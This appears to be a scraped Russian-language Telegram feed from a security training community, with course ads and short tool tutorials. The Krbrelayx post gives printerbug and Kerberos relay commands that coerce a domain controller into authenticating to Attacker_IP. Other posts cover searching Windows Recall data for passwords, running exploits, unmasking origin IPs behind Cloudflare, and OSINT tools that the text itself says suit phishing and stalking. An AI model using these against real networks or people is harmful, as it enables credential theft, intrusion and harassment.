Codeby
36.4K subscribers
1.86K photos
93 videos
12 files
7.66K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
🟧🟧🟧🟧 Мы запускаем флагманскую программу по Application Security!

AppSec — одно из самых востребованных и быстрорастущих направлений в кибербезопасности.
И теперь у нас есть полный 7-месячный практический курс, который готовит к работе в реальных проектах — от поиска уязвимостей до внедрения безопасного SDLC и DevSecOps.

Что ждёт на программе?
🟧 200+ часов практики
🟧 Личный стенд: SQLi, XSS, SSRF, LFI, IDOR, Race Condition и др.
🟧 Работа с SAST (Semgrep), DAST (Burp/ZAP/OAST), SCA (Trivy)
🟧 Secure SDLC, Threat Modeling, CVE/CWE/CVSS
🟧 Автоматизация безопасности в CI/CD
🟧 Финальный capstone: mini-CTF, созданный своими руками
🟧 Большое портфолио из 9 проектов, закрывающее требования junior-вакансий

🎓 По итогам — диплом о профпереквалификации и готовность выйти на рынок как:
Junior/Middle AppSec Engineer, Web-Pentester, Security Developer, DevSecOps-инженер.

Старт: 16 февраля
🟧🟧🟧 Первый поток доступен со скидкой 10%: 120.000 руб. 108.000 руб.

Набор открыт:
🟧 https://codeby.school/appsec.html
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍189🔥7😁3🙊21
👀 TotalRecall

Инструмент извлекает и отображает данные из Windows Recall, предоставляя удобный способ доступа к информации о снимках активности вашего ПК.

Windows Recall — это функция Microsoft, впервые представленная в 2024 году, которая автоматически делает снимки того, что происходит на экране ПК каждые пять секунд, если содержимое экрана отличается от предыдущего снимка, и сохраняет их в локальной базе данных.

Функция Recall позволяет искать контент, включая изображения и текст, с помощью естественного языка. Является частью экосистемы Copilot+ PC и интегрирована в Windows 11 и новую AI-платформу Microsoft.


Особенности

🔴Поддерживает фильтрацию по дате;
🔴Текстовый поиск конкретного значения;
🔴Предоставляет исчерпывающие отчеты.

🔴 Технические детали
Windows Recall хранит все данные локально в незашифрованной базе данных SQLite, а скриншоты просто сохраняются в папке на вашем компьютере по пути:
C:\Users\$USER\AppData\Local\CoreAIPlatform.00\UKP\{GUID}


Все изображения хранятся в следующей подпапке .\ImageStore\.
База данных ukg.db имеет относительно простую структуру, но содержит огромное количество информации.

Как работает инструмент
1️⃣TotalRecall копирует базу данных ukg.db и папку ImageStore в указанную папку для извлечения. Это гарантирует, что исходные данные останутся нетронутыми, пока вы будете изучать извлечённые данные.

2️⃣Анализирует базу данных SQLite, чтобы извлечь потенциально интересные артефакты, такие как заголовки окон, временные метки и токены изображений. Инструмент ищет записи, соответствующие заданным вами критериям (например, диапазону дат или поисковым запросам).

3️⃣Переименовывает файлы изображений в папке ImageStore с расширением .jpg, если оно ещё не присвоено. Это упрощает просмотр снимков экрана и управление ими.

4️⃣Позволяет искать определённые термины в базе данных, используя возможности оптического распознавания символов (OCR) в Windows Recall. Это значит, что вы можете найти текст, который был на вашем экране, даже если он был на изображении.

5️⃣Инструмент формирует сводку извлечённых данных, включая количество захваченных окон и сделанных снимков. Он также создаёт подробный отчёт в текстовом файле, в котором перечислены все захваченные данные и результаты поиска.

👁️Примеры использования
totalrecall.py [-h] [--from_date FROM_DATE] [--to_date TO_DATE] [--search SEARCH]


Поиск упоминаний термина password в период с 2024-06-04 по 2024-06-05.
totalrecall.py --search password --from_date 2024-06-04 --to_date 2024-06-05


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍126🔥6🤬1
Findsploit

Finsploit — это простой bash-скрипт для быстрого и лёгкого поиска по локальным и онлайн-базам данных эксплойтов. Этот репозиторий также включает в себя «copysploit» для копирования любого эксплойта exploit-db в текущий каталог и «compilesploit» для автоматической компиляции и запуска любого эксплойта на языке C.

💻Установка:
git clone https://github.com/1N3/Findsploit.git

cd Findsploit


📌Запуск:
./findsploit

Найдите все эксплойты и модули, используя один поисковый запрос:
./findsploit <WORD> (например apache)

Поиск по нескольким поисковым запросам:
./findsploit <WORD> <WORD>

Показать все эксплойты Metasploit:
./findsploit exploits


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍86
Namechk: Ваш Шерлок Холмс в мире цифровых следов и как защититься от его "темной стороны"

🔍Открытые данные — это пазл, который можно собрать в целостную картину о человеке или компании. Инструменты вроде Namechk превращают поиск по никнейму из рутинной задачи в мощный метод цифровой разведки.

Наша статья — практическое руководство по использованию OSINT (разведки по открытым источникам) для специалистов по безопасности и всех, кто хочет лучше защитить свои данные.

Вы узнаете, как:
💠Быстро находить профили по никнейму — автоматизируйте проверку сотен платформ за минуту. Узнаете, где ваш «старый» аккаунт уже фигурирует в слитых базах, и как это используют для фишинга и социальной инженерии.

💠Снизить риски кибератак — защитите бренд от фейков и клонов. Научитесь выявлять поддельные корпоративные аккаунты и страницы ключевых сотрудников, созданные для мошенничества.

💠Проводить аудит своей цифровой уязвимости — получите пошаговый метод, как оценить, что о вас или вашей компании знают в сети. Поймёте, какую информацию стоит скрыть, чтобы минимизировать риски.

Хотите погрузиться в тему глубже и начать применять OSINT на практике? 📌Читайте полную статью с детальными инструкциями и реальными примерами.

↖️Готовы превратить отдельные инструменты OSINT в цельное расследование? Ждём вас на курсе «OSINT: технология боевой разведки». Старт 26 января!

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍76
🟧 uncover

Инструмент, использующий API известных поисковых систем для быстрого обнаружения открытых хостов в интернете.

Обладает следующими характеристиками

🟧Одновременный запрос к нескольким поисковым системам;
🟧Поддержка доступных поисковых систем: Shodan, Censys, FOFA, Hunter, Quake, ZoomEye, Netlas, CriminalIP, PublicWWW, HunterHow, Google, Onyphe, Driftnet;
🟧Поддерживает ввод нескольких ключей API;
🟧Автоматическая рандомизация ключей API;
🟧Вывод uncover можно перенаправить в другие проекты в рамках рабочего процесса, принимающие stdin в качестве входных данных (например, uncover -q example -f ip | naabu).

Для успешной установки требуется go1.21.
 
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest


Файл конфигурации находится по пути $CONFIG/uncover/provider-config.yaml. Пример данного файла представлен ниже:

Если в файле конфигурации указано несколько ключей/учетных данных для одного и того же провайдера, для каждого выполнения будет использоваться случайный ключ.

🟧Использование
Поддерживает несколько способов выполнения запроса, включая stdin или флаг -q. По умолчанию для поиска используется shodan.
echo 'ssl:"Uber Technologies, Inc."' | uncover


Флаг -e можно использовать для выполнения одного и того же запроса в любой или во всех поисковых системах.
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip,driftnet


Поддерживает использование driftnet API для быстрого поиска открытых портов по заданному IP-адресу или CIDR-адресу.
echo 8.8.8.8/20 | uncover -e driftnet


Перенаправление вывода uncover в httpx в качестве входных данных.
uncover -q http.title:GitLab -silent | httpx -silent


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍7🔥4
Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory

Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.


🟧Набор Krbrelayx состоит из нескольких инструментов, каждый из которых нацелен на конкретные векторы атаки в инфраструктуре Active Directory:
- Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам
- Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service)
- Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием
- Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки

🟧Установка
sudo apt install krbrelayx

Проверяем
krbrelayx -h


🟧Переходим в директорию проекта и устанавливаем зависимости
cd krbrelayx
pip install -r requirements.txt


🟧Атака с использованием утилиты printerbug и ретрансляции
1. Запуск инструмента ретрансляции на машине атакующего
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)

2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$

В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями.

🟧Базовая команда для запуска слушателя и ретрансляции на указанный контроллер домена
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍6🔥5
🔔 Python стал универсальным инструментом, который снимает рутину с пентестера и ускоряет работу.
Посмотрим, как это происходит на практике. ⬆️


Готовы использовать Python, чтобы ваш пентест стал быстрее и глубже? Сделайте себе профессиональный подарок. Запись на курс «Python для Пентестера» открыта до 25 декабря.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

По всем вопросам пишите
⚡️ @Codeby_Academy
➡️ Все наши каналы 💬Все наши чаты
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍8🔥5👎1😁1
SSLScan: Инструмент для аудита SSL/TLS конфигураций
SSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.


💛Возможности
- Анализ всех поддерживаемых сервером шифров для различных версий протоколов (SSLv2, SSLv3, TLS 1.0-1.3)
- Четкое выявление, какие версии SSL и TLS (включая TLS 1.3) активированы на сервере
- Тестирование порядка предпочтения шифров со стороны сервера
- Получение детальной информации о цепочке сертификатов, включая алгоритмы подписи, срок действия, соответствие имени хоста (SNI) и использование расширений, таких как OCSP Must-Staple
- Проверка на наличие известных уязвимостей, включая Heartbleed (CVE-2014-0160), ROBOT, поддержку сжатия TLS (CRIME) и поддержку безопасного возобновления сессии (Secure Renegotiation)
- Возможность сканирования виртуальных хостов, использующих SNI
- Вывод в удобочитаемом виде или в формате XML/JSON для последующего анализа в автоматизированных системах

💛Установка
sudo apt install sslscan
Проверка
sslscan -h

💛Базовое сканирование хоста
sslscan example.com
Эта команда выполнит все основные проверки для домена example.com на стандартном порту 443

💛Сканирование с указанием порта
sslscan example.com:8443
Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах

💛Проверка конкретной версии протокола (например, только TLS 1.2 и TLS 1.3)
sslscan --tls13 --tls12 example.com

💛Тестирование всех поддерживаемых шифров без проверки сертификата
sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.com
Опция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра

💛Сохранение отчета в формате XML
sslscan --xml=report.xml example.com

💛Недостатки
⁃ Однопоточная архитектура делает полное сканирование всех шифров крайне медленным
- Для полной функциональности требуется статическая сборка с отдельной версией OpenSSL, что увеличивает размер файла и усложняет поддержку
- Базовые форматы отчетов (XML/JSON) требуют дополнительной обработки; отсутствует API для автоматизации

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍158🔥6
Mailcat

Mailcat - Найдите существующие адреса электронной почты по нику, используя методы проверки API/SMTP без уведомления пользователя.

📕Характеристики:
Удобный интерфейс
Поддержка tor
Поддержка proxy

💻Установка:
git clone https://github.com/sharsil/mailcat.git

cd mailcat

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 mailcat.py <NICKNAME>

Запуск с tor:
python3 mailcat.py --tor <NICKNAME>

Запуск с proxy:
proxychains4 -q python3 mailcat.py <NICKNAME> 

или
python3 mailcat.py <NICKNAME> --proxy https://127.0.0.1:8080


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍135🔥5
🟠Цифровая интимность на витрине. Компрометация PornHub ⚫️

Хакерская группировка ShinyHunters заявила о компрометации данных ≈200 миллионов пользователей Pornhub, сообщает Reuters. Злоумышленники требуют выкуп в биткоинах, угрожая публикацией информации в открытом доступе.
ShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.


Какие данные скомпрометированы
По подтверждённой информации, в утечке присутствуют:
🟠 email-адреса пользователей
🟠 история просмотров
🟠 поисковые запросы
🟠 ссылки и названия видео
🟠 метаданные пользовательской активности
Это не просто PII, а поведенческие данные, позволяющие точно восстановить цифровой профиль пользователя.

🔸Эксперты считают, что взлом мог произойти не через инфраструктуру Pornhub напрямую, а через сторонний аналитический сервис Mixpanel, с которым платформа сотрудничала до 2021 года.

🔸Pornhub сообщил о расследовании и рекомендовал пользователям сохранять бдительность.
Но в реальности этот инцидент — ещё одно напоминание:
если данные куда-то отправляются — значит, однажды они могут утечь

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
😁11🍓5🍌32🔥2😱1🐳1👀1
CloakQuest3r

CloakQuest3r — это мощный инструмент на Python, тщательно разработанный для раскрытия истинного IP-адреса веб-сайтов, защищённых Cloudflare и другими альтернативными сервисами, широко распространённым сервисом веб-безопасности и повышения производительности. Его основная задача — точно определить фактический IP-адрес веб-серверов, скрытых за защитой Cloudflare. Сканирование поддоменов является ключевым методом решения этой задачи. Этот инструмент — бесценный ресурс для тестировщиков на проникновение, специалистов по безопасности и веб-администраторов, стремящихся провести комплексную оценку безопасности и выявить уязвимости, которые могут быть скрыты мерами безопасности Cloudflare.

📕Характеристика:
Обнаружение реального IP-адреса: CloakQuest3r превосходно определяет реальные IP-адреса веб-серверов, использующих сервисы Cloudflare.
Сканирование поддоменов: Сканирование поддоменов является основополагающим компонентом процесса определения реального IP-адреса. Оно помогает определить фактический сервер, ответственный за размещение веб-сайта и связанных с ним поддоменов.
История IP-адресов: Извлекает историческую информацию об IP-адресах для заданного домена.
Анализ SSL-сертификата: Извлекает и анализирует SSL-сертификаты, связанные с целевым доменом.
Поточное сканирование: Для повышения эффективности и ускорения процесса определения реального IP-адреса CloakQuest3r использует многопоточность.

💻Установка:
git clone https://github.com/spyboy-productions/CloakQuest3r.git

cd CloakQuest3r


📌Запуск:
python cloakquest3r.py example.com


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
14👍6🔥5
WhatsMyName: как найти цифровой след человека за пару кликов 🔍

WhatsMyName — это OSINT-инструмент, который позволяет быстро проверить, на каких онлайн-платформах используется конкретное имя пользователя.
Без взлома. Без магии. Только открытые данные — и плохие привычки пользователей.

Что делает WhatsMyName
Инструмент проверяет сотни сайтов: соцсети, форумы, хостинги кода, сервисы для разработчиков, маркетплейсы и нишевые площадки.
Ты вводишь ник — сервис проверяет, зарегистрирован ли он на известных платформах.
Результат — список ресурсов, где этот username уже занят или существует.
И этого более чем достаточно, чтобы начать раскрутку личности.

Через WhatsMyName можно:
➡️ связать аккаунты человека на разных платформах
➡️ найти старые или забытые профили
➡️ определить интересы, профессию, хобби
➡️ подготовить фишинговую атаку или социальную инженерию
➡️ собрать профиль цели для дальнейшего OSINT

Для пентестера — инструмент.
Для журналиста — источник.
Для сталкера — оружие.
Для обычного пользователя — повод задуматься.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍7🔥6